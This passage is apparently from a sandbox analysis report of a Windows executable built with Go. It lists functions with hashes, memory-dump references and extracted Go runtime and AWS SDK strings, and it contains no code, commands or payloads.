bad statusscanobject n == 0swept cached spanmarkBits overflowruntime: summary[runtime: level = , p.searchAddr = RtlGetCurrentPeb
              • API String ID: 0-1298308350
              • Opcode ID: a61cafbb223d7cc81fbb6da1f05e0d3900cb8e6938fbbc6baa94071b28b8d10f
              • Instruction ID: bfb1c9c543a4d008ee4952664bf390c3d3a40685ddd56dd4ca3c8e3316bbc139
              • Opcode Fuzzy Hash: a61cafbb223d7cc81fbb6da1f05e0d3900cb8e6938fbbc6baa94071b28b8d10f
              • Instruction Fuzzy Hash: 7A51CFB4009705DFD345FFA4D18ABAEBBE4BF89704F01881EE48897252D7789948DB63
              Function 00782160 Relevance: 9.2, Strings: 7, Instructions: 483COMMON
              Download Yara Rule
              Strings
              • adxaesshaavxfmanetawsacmapscurdaxdlmdmsdrsebsec2ecseksfmsfsxgeoiamiotivskmsmghmgnlexoamapiramrdsrumsdbsmssnssqsssmssostsswftaxtnbwafsepINT%s.ArnSTSRSADSAURIio.%20imgcolampyenumlnotshyregdegETHethEtaRhoTauPhiChiPsietarhotauphichipsipivsumangcapcupsimsuplozzwjlr, xrefs: 00782190
              • pclmulqdqmath/randAWS Chinaaws-iso-baws-iso-eaws-iso-fca-west-1appconfigapprunnerappstreamcassandracodebuilddiscoveryevidentlyguarddutyinspectorioteventslightsailmedialivememory-dbqbusinessrobomakerschedulersms-voicetranslatedualstack{service}expr_stmtexpiresA, xrefs: 007821DA
              • rdtscppopcntcmd/goaws-cnathenabackupbraketcloud9configeventshealthkendralambdamacie2nimbleprotonshieldsignerstateswisdomlegacy%s: %s%s%sSTRING/token1.55.5X-Amz-ignore%%%02Xrfc822currenbrvbarplusmnmiddotfrac14frac12frac34iquestAgraveAacuteAtildeCcedilEgraveEa, xrefs: 007821F3
              • sse41sse42ssse3batchcaseschimedocdblocalemailkafkaomicspipespollywafv2startcommaFLOATcache.tmp-%s/%s (%s)- %s%s.%sECDSA31000host:ARN: paraminputframeiexclpoundlaquoacutemicrocedilraquoAcircAringAEligEcircIcircOcirctimesUcircTHORNszligacircaringaeligecircicirc, xrefs: 00782396
              • avx512fos/execruntimeUnknown%v: %#xaws-isoapi.awsaccountacm-pcaairflowamplifyapi.ecrpricingappflowappmeshappsyncbedrockbudgetsiotdataglaciergrafanaivschatkinesissandboxneptuneprofileroute53schemasssm-sapsupporttaggingvoiceidversion%s://%scommentliteralnewlinec, xrefs: 007826B3
              • avx512bwavx512vlgo/typesnet/httpgo/buildx509sha1AWS ISOFcloudhsmcodestardatabrewdatasyncdatazonedms-fipsdynamodbeks-authfinspacefirehoseforecastgameliftiam-fipsProdFipsopsworksoutpostspinpointrds-dataredshiftsnowballtextracttransferaws-fipsworkdocsworkmailregi, xrefs: 007826F4
              • ermssse3avx2bmi1bmi2aossfipsgluelogsoidcosisqldbrbins3v4xrayIPv6IPv4exprstmtskipBOOL.aws%s%sNameAWS4typeenumareametaaposquotnbspcentsectcopyordfmacrsup2sup3parasup1ordmAumlEumlIumlOumlUumlaumleumliumloumluumlyumlfnofBetaZetaIotabetazetaiotabullreallarruarrrarr, xrefs: 007821C1
              Memory Dump Source
              • Source File: 00000000.00000002.1440676788.0000000000781000.00000020.00000001.01000000.00000003.sdmp, Offset: 00780000, based on PE: true
              • Associated: 00000000.00000002.1440658485.0000000000780000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.1440958899.0000000000BC1000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.1440958899.0000000001138000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.1440958899.000000000114E000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.1440958899.0000000001162000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.1440958899.0000000001165000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.1440958899.000000000116A000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.1440958899.000000000116D000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.1440958899.0000000001170000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.1440958899.0000000001172000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.1440958899.0000000001177000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.1440958899.0000000001193000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.1440958899.000000000119B000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.1441537506.0000000001395000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.1441556835.0000000001397000.00000008.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.1441574120.0000000001398000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.1441592263.0000000001399000.00000008.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.1441606859.000000000139B000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.1441624849.000000000139C000.00000008.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.1441648858.00000000013C6000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.1441665201.00000000013C8000.00000008.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.1441682753.00000000013C9000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.1441702343.00000000013D1000.00000008.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.1441719725.00000000013D2000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.1441719725.00000000013DD000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.1441719725.0000000001415000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.1441719725.000000000141A000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.1441802262.0000000001426000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.1441802262.00000000014D7000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.1441993454.00000000016E5000.00000008.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.1442007238.00000000016E6000.00000002.00000001.01000000.00000003.sdmpDownload File
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_0_2_780000_file.jbxd
              Similarity
              • API ID:
              • String ID: adxaesshaavxfmanetawsacmapscurdaxdlmdmsdrsebsec2ecseksfmsfsxgeoiamiotivskmsmghmgnlexoamapiramrdsrumsdbsmssnssqsssmssostsswftaxtnbwafsepINT%s.ArnSTSRSADSAURIio.%20imgcolampyenumlnotshyregdegETHethEtaRhoTauPhiChiPsietarhotauphichipsipivsumangcapcupsimsuplozzwjlr$avx512bwavx512vlgo/typesnet/httpgo/buildx509sha1AWS ISOFcloudhsmcodestardatabrewdatasyncdatazonedms-fipsdynamodbeks-authfinspacefirehoseforecastgameliftiam-fipsProdFipsopsworksoutpostspinpointrds-dataredshiftsnowballtextracttransferaws-fipsworkdocsworkmailregi$avx512fos/execruntimeUnknown%v: %#xaws-isoapi.awsaccountacm-pcaairflowamplifyapi.ecrpricingappflowappmeshappsyncbedrockbudgetsiotdataglaciergrafanaivschatkinesissandboxneptuneprofileroute53schemasssm-sapsupporttaggingvoiceidversion%s://%scommentliteralnewlinec$ermssse3avx2bmi1bmi2aossfipsgluelogsoidcosisqldbrbins3v4xrayIPv6IPv4exprstmtskipBOOL.aws%s%sNameAWS4typeenumareametaaposquotnbspcentsectcopyordfmacrsup2sup3parasup1ordmAumlEumlIumlOumlUumlaumleumliumloumluumlyumlfnofBetaZetaIotabetazetaiotabullreallarruarrrarr$pclmulqdqmath/randAWS Chinaaws-iso-baws-iso-eaws-iso-fca-west-1appconfigapprunnerappstreamcassandracodebuilddiscoveryevidentlyguarddutyinspectorioteventslightsailmedialivememory-dbqbusinessrobomakerschedulersms-voicetranslatedualstack{service}expr_stmtexpiresA$rdtscppopcntcmd/goaws-cnathenabackupbraketcloud9configeventshealthkendralambdamacie2nimbleprotonshieldsignerstateswisdomlegacy%s: %s%s%sSTRING/token1.55.5X-Amz-ignore%%%02Xrfc822currenbrvbarplusmnmiddotfrac14frac12frac34iquestAgraveAacuteAtildeCcedilEgraveEa$sse41sse42ssse3batchcaseschimedocdblocalemailkafkaomicspipespollywafv2startcommaFLOATcache.tmp-%s/%s (%s)- %s%s.%sECDSA31000host:ARN: paraminputframeiexclpoundlaquoacutemicrocedilraquoAcircAringAEligEcircIcircOcirctimesUcircTHORNszligacircaringaeligecircicirc
              • API String ID: 0-3164501562
              • Opcode ID: ee3a1479eb01ff00ef9817950ffdd6de58a9fb317f7ef58469d53922928184a2
              • Instruction ID: 7fa7508a20e6e9028b0b5f686f4d09fdf17375a9c4e515ca87191c0a09078f9f
              • Opcode Fuzzy Hash: ee3a1479eb01ff00ef9817950ffdd6de58a9fb317f7ef58469d53922928184a2
              • Instruction Fuzzy Hash: 4E325AB8105341CFD728DF19E094B9ABBE1BB8A304F1885ADD8484B35BE739D946CF91
              Function 007BC520 Relevance: 8.9, Strings: 7, Instructions: 145COMMON
              Download Yara Rule
              Strings
              • +Inf-Inf: p=cas1cas2cas3cas4cas5cas6 at m= sp= sp: lr: fp= gp= mp=) m=quitbindJuneJulyEESTSASTAKSTAKDTACSTACDTAESTAEDTAWSTCESTNZSTNZDT as hourTagsTypeNONEarn:AhomChamKawiLisuMiaoModiNewaThaiToto3125Atoiint8uintchanfuncpartcallkind on != Fromicmpigmpftpspop3, xrefs: 007BC58E
              • -, xrefs: 007BC6BD
              • ., xrefs: 007BC6AA
              • e, xrefs: 007BC6AF
              • NaN P m= MPC= < end > and]:???pc= GSunMonTueWedThuFriSatJanFebMarAprMayJunJulAugSepOctNovDecUTCEET+00+01CATWATEATGMTHSTHDT-03-04-05ESTCSTCDTMSTMDT-02EDTASTADTPSTPDTNSTNDT+06+03+04+07IST+09+08IDT+12PKT+11KST+05JST+10-01-11-12-08-09+13CETBSTMSK-06+14StdDltPU, xrefs: 007BC60D
              • -, xrefs: 007BC5F8
              • -Inf: p=cas1cas2cas3cas4cas5cas6 at m= sp= sp: lr: fp= gp= mp=) m=quitbindJuneJulyEESTSASTAKSTAKDTACSTACDTAESTAEDTAWSTCESTNZSTNZDT as hourTagsTypeNONEarn:AhomChamKawiLisuMiaoModiNewaThaiToto3125Atoiint8uintchanfuncpartcallkind on != Fromicmpigmpftpspop3smtp, xrefs: 007BC574
              Memory Dump Source
              • Source File: 00000000.00000002.1440676788.0000000000781000.00000020.00000001.01000000.00000003.sdmp, Offset: 00780000, based on PE: true
              • Associated: 00000000.00000002.1440658485.0000000000780000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.1440958899.0000000000BC1000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.1440958899.0000000001138000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.1440958899.000000000114E000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.1440958899.0000000001162000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.1440958899.0000000001165000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.1440958899.000000000116A000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.1440958899.000000000116D000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.1440958899.0000000001170000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.1440958899.0000000001172000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.1440958899.0000000001177000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.1440958899.0000000001193000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.1440958899.000000000119B000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.1441537506.0000000001395000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.1441556835.0000000001397000.00000008.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.1441574120.0000000001398000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.1441592263.0000000001399000.00000008.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.1441606859.000000000139B000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.1441624849.000000000139C000.00000008.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.1441648858.00000000013C6000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.1441665201.00000000013C8000.00000008.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.1441682753.00000000013C9000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.1441702343.00000000013D1000.00000008.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.1441719725.00000000013D2000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.1441719725.00000000013DD000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.1441719725.0000000001415000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.1441719725.000000000141A000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.1441802262.0000000001426000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.1441802262.00000000014D7000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.1441993454.00000000016E5000.00000008.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.1442007238.00000000016E6000.00000002.00000001.01000000.00000003.sdmpDownload File
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_0_2_780000_file.jbxd
              Similarity
              • API ID:
              • String ID: +Inf-Inf: p=cas1cas2cas3cas4cas5cas6 at m= sp= sp: lr: fp= gp= mp=) m=quitbindJuneJulyEESTSASTAKSTAKDTACSTACDTAESTAEDTAWSTCESTNZSTNZDT as hourTagsTypeNONEarn:AhomChamKawiLisuMiaoModiNewaThaiToto3125Atoiint8uintchanfuncpartcallkind on != Fromicmpigmpftpspop3$-$-$-Inf: p=cas1cas2cas3cas4cas5cas6 at m= sp= sp: lr: fp= gp= mp=) m=quitbindJuneJulyEESTSASTAKSTAKDTACSTACDTAESTAEDTAWSTCESTNZSTNZDT as hourTagsTypeNONEarn:AhomChamKawiLisuMiaoModiNewaThaiToto3125Atoiint8uintchanfuncpartcallkind on != Fromicmpigmpftpspop3smtp$.$NaN P m= MPC= < end > and]:???pc= GSunMonTueWedThuFriSatJanFebMarAprMayJunJulAugSepOctNovDecUTCEET+00+01CATWATEATGMTHSTHDT-03-04-05ESTCSTCDTMSTMDT-02EDTASTADTPSTPDTNSTNDT+06+03+04+07IST+09+08IDT+12PKT+11KST+05JST+10-01-11-12-08-09+13CETBSTMSK-06+14StdDltPU$e
              • API String ID: 0-3390551203
              • Opcode ID: 277557ed13d30b2c5bcdcc983cfaa3c6aaa3ce5bf4dc0e5f691946b3a3da0379
              • Instruction ID: ada8585e636ada2a7c69b03f2b1bce5664a09f834a5b384f14810421a8e91cf2
              • Opcode Fuzzy Hash: 277557ed13d30b2c5bcdcc983cfaa3c6aaa3ce5bf4dc0e5f691946b3a3da0379
              • Instruction Fuzzy Hash: D3517C71409B458EC30BEF38C0553AABB947FA2384F50CB5EE89366292E77851998753
              Function 0078C780 Relevance: 8.9, Strings: 7, Instructions: 128COMMON
              Download Yara Rule
              Strings
              • 1, xrefs: 0078C997
              • s.allocCount != s.nelems && freeIndex == s.nelemsdelayed zeroing on data that may contain pointersruntime.reflect_makemap: unsupported map key typesweeper left outstanding across sweep generationsfully empty unfreed span set block found in resetcasgstatus: wai, xrefs: 0078C98E
              • s.allocCount= key size wrongnil elem type! to finalizer GC worker initruntime: full=runtime: want=MB; allocated timeEndPeriod, xrefs: 0078C87C
              • runtime: s.allocCount= s.allocCount > s.nelems/gc/heap/allocs:objectsmissing type in runfinqruntime: internal errorwork.nwait > work.nprocleft over markroot jobsgcDrain phase incorrectMB during sweep; swept bad profile stack countruntime: netpoll failedRtlGetN, xrefs: 0078C920
              • s.allocCount > s.nelems/gc/heap/allocs:objectsmissing type in runfinqruntime: internal errorwork.nwait > work.nprocleft over markroot jobsgcDrain phase incorrectMB during sweep; swept bad profile stack countruntime: netpoll failedRtlGetNtVersionNumbers, xrefs: 0078C8EA
              • s.nelems= of size runtime: p ms clock, nBSSRoots=runtime: P exp.) for minTrigger=GOMEMLIMIT=bad m value, elemsize= freeindex= span.list=, npages = tracealloc( p->status= in status idleprocs= gcwaiting= schedtick= timerslen= mallocing=bad timedivfloat64, xrefs: 0078C8B6, 0078C95A
              • freeIndex is not validoldoverflow is not nils.freeindex > s.nelemsbad sweepgen in refillspan has no free space/gc/scan/globals:bytes/gc/heap/frees:objectsruntime: work.nwait = runtime:scanstack: gp=scanstack - bad statusheadTailIndex overflowruntime.main not o, xrefs: 0078C900
              Memory Dump Source
              • Source File: 00000000.00000002.1440676788.0000000000781000.00000020.00000001.01000000.00000003.sdmp, Offset: 00780000, based on PE: true
              • Associated: 00000000.00000002.1440658485.0000000000780000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.1440958899.0000000000BC1000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.1440958899.0000000001138000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.1440958899.000000000114E000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.1440958899.0000000001162000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.1440958899.0000000001165000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.1440958899.000000000116A000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.1440958899.000000000116D000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.1440958899.0000000001170000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.1440958899.0000000001172000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.1440958899.0000000001177000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.1440958899.0000000001193000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.1440958899.000000000119B000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.1441537506.0000000001395000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.1441556835.0000000001397000.00000008.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.1441574120.0000000001398000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.1441592263.0000000001399000.00000008.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.1441606859.000000000139B000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.1441624849.000000000139C000.00000008.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.1441648858.00000000013C6000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.1441665201.00000000013C8000.00000008.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.1441682753.00000000013C9000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.1441702343.00000000013D1000.00000008.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.1441719725.00000000013D2000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.1441719725.00000000013DD000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.1441719725.0000000001415000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.1441719725.000000000141A000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.1441802262.0000000001426000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.1441802262.00000000014D7000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.1441993454.00000000016E5000.00000008.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.1442007238.00000000016E6000.00000002.00000001.01000000.00000003.sdmpDownload File
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_0_2_780000_file.jbxd
              Similarity
              • API ID:
              • String ID: s.nelems= of size runtime: p ms clock, nBSSRoots=runtime: P exp.) for minTrigger=GOMEMLIMIT=bad m value, elemsize= freeindex= span.list=, npages = tracealloc( p->status= in status idleprocs= gcwaiting= schedtick= timerslen= mallocing=bad timedivfloat64$1$freeIndex is not validoldoverflow is not nils.freeindex > s.nelemsbad sweepgen in refillspan has no free space/gc/scan/globals:bytes/gc/heap/frees:objectsruntime: work.nwait = runtime:scanstack: gp=scanstack - bad statusheadTailIndex overflowruntime.main not o$runtime: s.allocCount= s.allocCount > s.nelems/gc/heap/allocs:objectsmissing type in runfinqruntime: internal errorwork.nwait > work.nprocleft over markroot jobsgcDrain phase incorrectMB during sweep; swept bad profile stack countruntime: netpoll failedRtlGetN$s.allocCount != s.nelems && freeIndex == s.nelemsdelayed zeroing on data that may contain pointersruntime.reflect_makemap: unsupported map key typesweeper left outstanding across sweep generationsfully empty unfreed span set block found in resetcasgstatus: wai$s.allocCount > s.nelems/gc/heap/allocs:objectsmissing type in runfinqruntime: internal errorwork.nwait > work.nprocleft over markroot jobsgcDrain phase incorrectMB during sweep; swept bad profile stack countruntime: netpoll failedRtlGetNtVersionNumbers$s.allocCount= key size wrongnil elem type! to finalizer GC worker initruntime: full=runtime: want=MB; allocated timeEndPeriod
              • API String ID: 0-428273022
              • Opcode ID: 6132e3a80ed4a7ebdce257112c13e17fbe1ab2d61b9979908fa8e6a79bd5d4dd
              • Instruction ID: d93cc978f4f2e7641bcc91daf3f508bc0b9d8bc0a63f3df0866a2c7e9e0e1346
              • Opcode Fuzzy Hash: 6132e3a80ed4a7ebdce257112c13e17fbe1ab2d61b9979908fa8e6a79bd5d4dd
              • Instruction Fuzzy Hash: 2951E3B4409354DAC345EF65C19976EBBE0FF88705F40885EF8C887282EB788985DB63
              Function 007E2A30 Relevance: 8.9, Strings: 7, Instructions: 123COMMON
              Download Yara Rule
              Strings
              • not in ranges:invalid exchangeno route to hostinvalid argumentmessage too longobject is remoteremote I/O errorSetFilePointerExOpenProcessTokenRegQueryInfoKeyWRegQueryValueExWDnsNameCompare_WCreateDirectoryWFlushFileBuffersGetComputerNameWGetFullPathNameWGetL, xrefs: 007E2B40
              • base hangupkilledlistensocketSundayMondayFridayAugustUTC-11UTC-02UTC-08UTC-09UTC+12UTC+13minutesecond-fips-regionBucket%s[%v]PolicyGetAceGetACPsendtoCommonArabicBrahmiCarianChakmaCopticGothicHangulHatranHebrewKaithiKhojkiLepchaLycianLydianRejangSyriacTai_LeTa, xrefs: 007E2B16
              • runtime: text offset base pointer out of rangeTime.UnmarshalJSON: input is not a JSON stringfailed to find credentials in the environment.reflect: nil type passed to Type.ConvertibleToPSSWithSHA256PSSWithSHA384PSSWithSHA512Ed25519tls: server chose an unconfigu, xrefs: 007E2C13
              • ., xrefs: 007E2C1C
              • etypes no anodeCancelIoReadFileAcceptExWSAIoctlshutdownThursdaySaturdayFebruaryNovemberDecember%!Month(_NewEnum%02d%02drole_arncsm_hostcsm_portUploadIdEqualSidSetEventIsWindowrecvfromnil PoolArmenianBalineseBopomofoBugineseCherokeeCyrillicDuployanEthiopicGeor, xrefs: 007E2BCD
              • runtime: textOff permission deniedwrong medium typeno data availableexec format errorLookupAccountSidWDnsRecordListFreeGetCurrentProcessGetShortPathNameWWSAEnumProtocolsWGTB Standard TimeFLE Standard TimeGMT Standard Timefractional secondCanSet() is falseEnvSe, xrefs: 007E2AED
              • types : type abortedCopySidWSARecvWSASendconnectsignal TuesdayJanuaryOctoberMUI_StdMUI_Dltdefaultaws_csmoutpostFreeSidSleepExAvestanBengaliBrailleCypriotDeseretElbasanElymaicGranthaHanunooKannadaMakasarMandaicMarchenMultaniMyanmarOsmanyaSharadaShavianSiddhamS, xrefs: 007E2BA3
              Memory Dump Source
              • Source File: 00000000.00000002.1440676788.0000000000781000.00000020.00000001.01000000.00000003.sdmp, Offset: 00780000, based on PE: true
              • Associated: 00000000.00000002.1440658485.0000000000780000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.1440958899.0000000000BC1000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.1440958899.0000000001138000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.1440958899.000000000114E000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.1440958899.0000000001162000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.1440958899.0000000001165000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.1440958899.000000000116A000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.1440958899.000000000116D000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.1440958899.0000000001170000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.1440958899.0000000001172000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.1440958899.0000000001177000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.1440958899.0000000001193000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.1440958899.000000000119B000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.1441537506.0000000001395000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.1441556835.0000000001397000.00000008.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.1441574120.0000000001398000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.1441592263.0000000001399000.00000008.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.1441606859.000000000139B000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.1441624849.000000000139C000.00000008.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.1441648858.00000000013C6000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.1441665201.00000000013C8000.00000008.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.1441682753.00000000013C9000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.1441702343.00000000013D1000.00000008.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.1441719725.00000000013D2000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.1441719725.00000000013DD000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.1441719725.0000000001415000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.1441719725.000000000141A000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.1441802262.0000000001426000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.1441802262.00000000014D7000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.1441993454.00000000016E5000.00000008.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.1442007238.00000000016E6000.00000002.00000001.01000000.00000003.sdmpDownload File
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_0_2_780000_file.jbxd
              Similarity
              • API ID:
              • String ID: types : type abortedCopySidWSARecvWSASendconnectsignal TuesdayJanuaryOctoberMUI_StdMUI_Dltdefaultaws_csmoutpostFreeSidSleepExAvestanBengaliBrailleCypriotDeseretElbasanElymaicGranthaHanunooKannadaMakasarMandaicMarchenMultaniMyanmarOsmanyaSharadaShavianSiddhamS$ base hangupkilledlistensocketSundayMondayFridayAugustUTC-11UTC-02UTC-08UTC-09UTC+12UTC+13minutesecond-fips-regionBucket%s[%v]PolicyGetAceGetACPsendtoCommonArabicBrahmiCarianChakmaCopticGothicHangulHatranHebrewKaithiKhojkiLepchaLycianLydianRejangSyriacTai_LeTa$ etypes no anodeCancelIoReadFileAcceptExWSAIoctlshutdownThursdaySaturdayFebruaryNovemberDecember%!Month(_NewEnum%02d%02drole_arncsm_hostcsm_portUploadIdEqualSidSetEventIsWindowrecvfromnil PoolArmenianBalineseBopomofoBugineseCherokeeCyrillicDuployanEthiopicGeor$ not in ranges:invalid exchangeno route to hostinvalid argumentmessage too longobject is remoteremote I/O errorSetFilePointerExOpenProcessTokenRegQueryInfoKeyWRegQueryValueExWDnsNameCompare_WCreateDirectoryWFlushFileBuffersGetComputerNameWGetFullPathNameWGetL$.$runtime: text offset base pointer out of rangeTime.UnmarshalJSON: input is not a JSON stringfailed to find credentials in the environment.reflect: nil type passed to Type.ConvertibleToPSSWithSHA256PSSWithSHA384PSSWithSHA512Ed25519tls: server chose an unconfigu$runtime: textOff permission deniedwrong medium typeno data availableexec format errorLookupAccountSidWDnsRecordListFreeGetCurrentProcessGetShortPathNameWWSAEnumProtocolsWGTB Standard TimeFLE Standard 